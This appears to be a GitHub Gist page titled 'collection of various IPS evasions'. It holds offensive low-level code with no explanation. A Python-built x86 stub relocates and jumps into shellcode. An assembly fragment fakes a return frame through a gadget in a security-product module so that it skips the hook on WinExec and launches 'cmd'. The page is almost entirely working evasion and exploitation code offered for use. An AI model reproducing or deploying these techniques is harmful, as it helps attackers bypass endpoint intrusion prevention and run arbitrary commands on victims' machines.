Skip to content

Instantly share code, notes, and snippets.

@gerry gerry/
Created Apr 18, 2010

What would you like to do?
collection of various IPS evasions
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
tls_header += "\xC3" # RETN
pop ebx ; Real return address
push 0x00220000 ; Address of push ebp/call ebp after a call.
push ebx ; Final return to the real return address
push 0xbadc0de2 ; Junk to align stack for pop ebp
push [ebp+0x4] ; Pointer to 'cmd\0'
push 0x1010303D ; Address of pop ebp/ret(after a call) in CSAUSER
push ebp ; WinExec preable
mov ebp, esp
sub esp, 0x54 ; end WinExec preable
jmp eax ; jmp past WinExec hook. (eax = &WinExec + 0x6)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.